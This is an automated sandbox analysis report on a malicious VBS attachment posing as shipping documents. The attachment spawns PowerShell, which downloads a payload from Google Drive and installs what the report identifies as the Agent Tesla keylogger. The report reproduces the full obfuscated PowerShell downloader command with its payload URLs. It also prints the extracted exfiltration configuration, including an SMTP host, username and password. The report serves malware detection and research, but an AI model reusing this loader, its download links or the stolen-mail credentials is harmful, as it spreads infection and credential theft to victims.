SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.BelieNOffsheRdseltBe or. Sco.WPoiaae IchtbGi maCKa

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Found malware configuration
            Source: WmiPrvSE.exe.4004.2.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.myhydropowered.com", "Username": "antenna@myhydropowered.com", "Password": "jnKkQ2DFtjsDqGZ"}
            Source: unknownHTTPS traffic detected: 64.233.185.102:443 -> 192.168.2.8:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 64.233.185.132:443 -> 192.168.2.8:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 64.233.185.102:443 -> 192.168.2.8:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 64.233.185.132:443 -> 192.168.2.8:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.8:49717 version: TLS 1.2
            Source: Binary string: Management.Automation.pdb source: powershell.exe, 00000007.00000002.2057508825.00000000071DC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000007.00000002.2050424001.0000000002D40000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2057508825.00000000071B6000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: ip-api.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1NIu13gYclipFPqq145lj8sWnvpxxfEld HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1NIu13gYclipFPqq145lj8sWnvpxxfEld&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1NIu13gYclipFPqq145lj8sWnvpxxfEld HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1NIu13gYclipFPqq145lj8sWnvpxxfEld&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: wscript.exe, 00000001.00000003.1606614767.0000024CCF25F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1607337961.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1608061400.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: wscript.exe, 00000001.00000003.1485959953.0000024CD1079000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1486237461.0000024CD10A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1606614767.0000024CCF25F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1485193301.0000024CD10A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1607337961.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1608061400.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1608193930.0000024CD0FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: wscript.exe, 00000001.00000003.1486237461.0000024CD10A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d4733d4e148b3
            Source: wscript.exe, 00000001.00000003.1486091804.0000024CD102D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1486237461.0000024CD1055000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d4733d4e14
            Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
            Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
            Source: powershell.exe, 00000003.00000002.2255196351.00000250CBDD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000003.00000002.2157807692.00000250BBD61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2051623128.0000000004AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000003.00000002.2157807692.00000250BBD61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000007.00000002.2051623128.0000000004AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googPz
            Source: powershell.exe, 00000003.00000002.2157807692.00000250BBF87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BD61A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
            Source: powershell.exe, 00000003.00000002.2157807692.00000250BBF87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5P
            Source: powershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5XR
            Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
            Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
            Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5&export=download
            Source: powershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000003.00000002.2157807692.00000250BCFF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000003.00000002.2255196351.00000250CBDD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownHTTPS traffic detected: 64.233.185.102:443 -> 192.168.2.8:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 64.233.185.132:443 -> 192.168.2.8:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 64.233.185.102:443 -> 192.168.2.8:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 64.233.185.132:443 -> 192.168.2.8:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.8:49717 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Installs a global keyboard hook
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi32_1836.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6816, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 1836, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Potential malicious VBS script found (suspicious strings)
            Source: Initial file: aldous.ShellExecute Kirkemusiks,Stedfortraeder93,"","" ,Deceleron
            Very long command line found
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6670
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6670
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6670Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6670Jump to behavior
            Writes or reads registry keys via WMI
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.Beli
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.BeliJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB4B24C3423_2_00007FFB4B24C342
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB4B24B5963_2_00007FFB4B24B596
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_02E0F2587_2_02E0F258
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_02E0FB287_2_02E0FB28
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_02E0A2A07_2_02E0A2A0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_02E0A59D7_2_02E0A59D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_02E009AD7_2_02E009AD
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_02E0EF107_2_02E0EF10
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_02E0D6047_2_02E0D604
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_02DF4AC011_2_02DF4AC0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_02DF3EA811_2_02DF3EA8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_02DF41F011_2_02DF41F0
            Source: Shipping Dcuments_CI PKL_HL_.vbsInitial sample: Strings found which are bigger than 50
            Source: amsi32_1836.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6816, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 1836, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@13/9@5/4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Electronegative.ShaJump to behavior
